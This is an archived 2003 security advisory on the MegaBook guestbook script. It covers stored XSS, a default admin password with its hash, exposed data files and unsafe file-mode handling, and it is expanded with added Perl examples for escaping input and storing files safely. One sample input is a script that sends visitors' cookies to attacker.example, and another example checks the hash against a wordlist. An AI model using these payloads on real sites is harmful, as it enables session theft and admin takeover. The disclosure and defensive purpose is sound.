Megabook 2.0 - XSS & UA execution

From: morning_wood (se_cur_ityat_private)
Date: Mon Jun 30 2003 - 09:56:03 PDT

    ------------------------------------------------------------------
              - EXPL-A-2003-011 exploitlabs.com Advisory 011
    ------------------------------------------------------------------
                            -= MegaBook =-
    
    
    
    exploitlabs.com
    June 29, 2003
    
    
    
    Vulnerability(s):
    -----------------
    1. XSS and unchecked input length
    2. Default admin password
    3. XSS via User-Agent (UA)
    4. Not secure on NT
    5. Undocumented attack vectors
    
    Product:
    --------
    megabook guestbook
    http://www.militerry.com/megabook/
    
    Description of product:
    -----------------------
    "Megabook is an online guestbook that allows users that come to your
    site to leave a message. These messages can also contain their e-mail
    addresses, websites." "Everyone will be able to view the messages left
    by past users" ...and whatever XSS they care to leave.
    
    From their FAQ:
    
    "Q: Will Megabook work on Windows NT servers?
    A: Megabook was only tested on UNIX-based servers.
    There is a possibility that it could work but from
    other people testing it seems that it won't."
    
    Dunno who they use to test, but it works fine on NT (heck, I'll beta).
    
    Note: this is a very popular script, easily found with Google by
    searching for gbook.db. All tests were run in a default state per the
    installation instructions and confirmed in the wild.
    
    
    VULNERABILITY / EXPLOIT
    ======================
    
    where to start...
    
    
    1. XSS is executable via the login field in admin.cgi, which enforces
    no length limit on the input.
    http://[test-url]/megabook/admin.cgi
    
    2. The default password is "megabook"
    http://www.militerry.com/megabook/files/20/setup.db ( note:
    meJyatGfwfBXQ  = megabook )
    The stored value is a traditional crypt(3) hash; its first two
    characters are the salt, and since the salt is taken from the password
    itself, the first two characters of the hash are always the first two
    characters of the real password, in order.
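    The Perl below is an added example, not part of the advisory or of
    MegaBook, showing the check a practitioner would run against a
    retrieved setup.db: the 13-character value is a traditional crypt(3)
    DES hash whose first two characters are the salt, so when the script
    salts with the first two characters of the password the hash itself
    says where to start guessing. The setup.db layout, the file name and
    the wordlist are assumptions; the hash meJyatGfwfBXQ and the default
    "megabook" come from the advisory. It needs a libc whose crypt()
    still implements the traditional two-character-salt DES scheme.

```perl
#!/usr/bin/perl
# Added example, not MegaBook's code: checking a retrieved setup.db for the
# default password and using the salt the hash discloses to prune guesses.
# The setup.db layout, file name and wordlist are assumptions; the hash
# meJyatGfwfBXQ and the default "megabook" are from the advisory.
# Needs a libc whose crypt() still implements traditional DES (2-char salt).
use strict;
use warnings;

# A traditional crypt(3) DES hash is 13 chars from [./0-9A-Za-z]; the
# first two are the salt, echoed back verbatim at the front of the output.
sub salt_of {
    my ($hash) = @_;
    return undef unless defined $hash && $hash =~ /^[.\/0-9A-Za-z]{13}$/;
    return substr($hash, 0, 2);
}

# Because the script salts with the first two characters of the password,
# a candidate can only match if it starts with the salt; everything else
# is discarded without a crypt() call. Returns (password or undef, number
# of crypt() calls made).
sub crack {
    my ($hash, @wordlist) = @_;
    my $salt = salt_of($hash);
    return (undef, 0) unless defined $salt;
    my $tried = 0;
    for my $word (@wordlist) {
        next unless substr($word, 0, 2) eq $salt;   # free pruning
        $tried++;
        my $got = crypt($word, $salt);
        return ($word, $tried) if defined $got && $got eq $hash;
    }
    return (undef, $tried);
}

# Constructed setup.db contents: the hash from the advisory on its own
# line plus an admin address (the real file's layout may differ).
my @setup = ("meJyatGfwfBXQ\n", "admin\@example.com\n");
chomp @setup;
my ($hash) = grep { /^[.\/0-9A-Za-z]{13}$/ } @setup;
die "no crypt(3) hash found in setup.db\n" unless defined $hash;

# "megan" shares the prefix and costs a crypt() call; the rest are skipped.
my @wordlist = qw(password guestbook megan admin megabook letmein);
my ($pw, $tried) = crack($hash, @wordlist);
printf "salt '%s' leaks the password prefix; %d of %d candidates needed crypt()\n",
    salt_of($hash), $tried, scalar @wordlist;
print defined $pw ? "password is '$pw'\n" : "no match in wordlist\n";
```

    Run it against the setup.db you actually retrieved by replacing the
    constructed @setup; per the advisory's note the hash above is that of
    "megabook", so the run should report it after two crypt() calls out of
    six candidates.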
    
    3. User-Agent XSS vulnerability in gbook.db
    Signing the guestbook with a User-Agent header that contains script
    stores that script in gbook.db unescaped, so it is rendered, and
    executed, in the browser of anyone who views the guestbook.
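    Items 1 and 3 are the same bug in two places: client-controlled text
    (the admin login field, the User-Agent header) is written into the
    record and later into the page without HTML escaping or a length
    limit. The Perl below is an added example, not MegaBook's code,
    contrasting that pattern with an escaped, length-limited version; the
    field names, the length caps and the record layout are assumptions.

```perl
#!/usr/bin/perl
# Added example, not MegaBook's code: handling the two client-controlled
# inputs the advisory abuses (admin login field, User-Agent header).
# Field names, length caps and record layout are assumptions.
use strict;
use warnings;

# Vulnerable pattern: whatever the client sent is interpolated straight
# into the record and later into the page.
sub render_entry_vulnerable {
    my ($name, $msg, $ua) = @_;
    return "<b>$name</b> wrote: $msg<br>\n<i>Browser: $ua</i><hr>\n";
}

# Escape the characters that let text break out of an HTML text node or
# a quoted attribute. Done at output time, so the stored record stays raw
# but can never be rendered as markup.
sub html_escape {
    my ($s) = @_;
    $s = '' unless defined $s;
    $s =~ s/&/&amp;/g;
    $s =~ s/</&lt;/g;
    $s =~ s/>/&gt;/g;
    $s =~ s/"/&quot;/g;
    $s =~ s/'/&#39;/g;
    return $s;
}

# Enforce a length cap and strip CR/LF: a newline inside a field would
# start a new gbook.db record. (The $max values are assumptions.)
sub clip {
    my ($s, $max) = @_;
    $s = '' unless defined $s;
    $s =~ s/[\r\n]//g;
    return length($s) > $max ? substr($s, 0, $max) : $s;
}

sub render_entry_safe {
    my ($name, $msg, $ua) = @_;
    return sprintf("<b>%s</b> wrote: %s<br>\n<i>Browser: %s</i><hr>\n",
        html_escape(clip($name, 40)),
        html_escape(clip($msg, 2000)),
        html_escape(clip($ua, 200)));
}

# Constructed sample input: a User-Agent header carrying script, as a
# visitor could send with e.g. curl -A. In a real CGI this value comes
# from $ENV{HTTP_USER_AGENT}.
my $ua   = '<script>new Image().src="http://attacker.example/?c="+document.cookie</script>';
my $name = 'guest';
my $msg  = 'hello';

print "--- vulnerable ---\n", render_entry_vulnerable($name, $msg, $ua);
print "--- escaped ---\n",    render_entry_safe($name, $msg, $ua);
```

    The first block of output contains a live <script> element; the second
    renders it as literal text. The same html_escape() belongs in front of
    the admin.cgi login field when it is echoed back, and clip() is what
    puts the missing length limit on it.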
    
    There are many more issues in this very popular script... I lost
    track.
    
    4. Despite the vendor saying the script does not work on NT, it does
    once Perl is installed, but this configuration is not desirable: the
    chmod() calls the script relies on cannot make a file unreadable on NT,
    so all of its data files become readable through the web server.
    ( gbook.db contains e-mail and IP addresses )
    ( setup.db contains the weakly hashed admin password and admin info )
    
    5. preview.txt, missing.txt and signgbook.cgi (sic) provide a posting
    function ( not documented )
    --------- snip of the cgi -------------
    # setup.db normally sits at mode 0000; it is opened up to 0666 (world
    # readable and writable) for the read and locked down again afterwards.
    chmod(0666, "setup.db");
    open (SETUP, "setup.db");   # return value unchecked
    @setup = <SETUP>;
    close(SETUP);
    # if the script dies before this line the file stays world-writable
    chmod(0000, "setup.db");
    -------- end snip--------------------
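    The chmod(0666)/chmod(0000) toggle in the snip is what keeps the web
    server from serving setup.db: it leaves the file world-writable while
    it is read, leaves it 0666 if the script dies in between, and on NT,
    where Perl's chmod() only toggles the read-only attribute, it cannot
    make the file unreadable at all. The Perl below is an added example,
    not MegaBook's code, showing the alternative: data files outside the
    document root, created with a restrictive mode once and never widened,
    with flock() so concurrent posts do not interleave. The data directory,
    file name and tab-separated record layout are assumptions.

```perl
#!/usr/bin/perl
# Added example, not MegaBook's code: reading and appending guestbook
# records without toggling file modes at run time. The data directory,
# file name and tab-separated record layout are assumptions.
use strict;
use warnings;
use Fcntl qw(:flock O_RDONLY O_WRONLY O_APPEND O_CREAT);
use File::Spec;
use File::Temp qw(tempdir);

# Keep the data files outside the document root so the web server never
# serves gbook.db or setup.db; the directory should be 0700 and owned by
# the web server user. This also holds on NT, where Perl's chmod() only
# toggles the read-only attribute and cannot hide a file from the server.
# For this demo the default is a throw-away temp dir.
my $DATA_DIR = $ENV{GBOOK_DATA} // tempdir(CLEANUP => 1);

sub data_path {
    my ($name) = @_;
    die "bad data file name\n" unless $name =~ /^[A-Za-z0-9_.-]+$/;  # no ../
    return File::Spec->catfile($DATA_DIR, $name);
}

# Readers take a shared lock; nothing here changes the file mode.
sub read_records {
    my ($name) = @_;
    my $path = data_path($name);
    sysopen(my $fh, $path, O_RDONLY) or die "open $path: $!\n";
    flock($fh, LOCK_SH)              or die "lock $path: $!\n";
    my @lines = <$fh>;
    close($fh);
    chomp @lines;
    return @lines;
}

# The writer creates the file 0600 the first time (umask 077 so the
# environment cannot widen the mode) and appends under an exclusive
# lock, so two simultaneous posts cannot interleave. CR/LF are stripped
# because one record is one line.
sub append_record {
    my ($name, $line) = @_;
    my $path = data_path($name);
    $line =~ s/[\r\n]//g;
    my $old_umask = umask(077);
    my $ok = sysopen(my $fh, $path, O_WRONLY | O_APPEND | O_CREAT, 0600);
    umask($old_umask);
    $ok or die "open $path: $!\n";
    flock($fh, LOCK_EX) or die "lock $path: $!\n";
    print {$fh} "$line\n";
    close($fh) or die "close $path: $!\n";
    return 1;
}

# Usage with a constructed entry.
append_record('gbook.db', join("\t", 'guest', 'guest@example.com',
                                     '203.0.113.7', 'hello'));
my @records = read_records('gbook.db');
print scalar(@records), " record(s); last: $records[-1]\n";
```

    In production set GBOOK_DATA to a directory the web server cannot
    serve; the point is that the mode is decided once, at creation, and
    the script never has to hand the file to the world to read it.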
    
    
    Local:
    ------
    not really
    
    Remote:
    -------
    real bad
    
    
    
    Vendor Fix:
    -----------
    No fix on 0day
    
    Vendor Contact:
    ---------------
    megabookat_private
    Concurrent with this advisory
    
    
    Credits:
    --------
    Donnie Werner
    http://exploitlabs.com
    http://frame4.com
    



    This archive was generated by hypermail 2b30 : Mon Jun 30 2003 - 11:55:17 PDT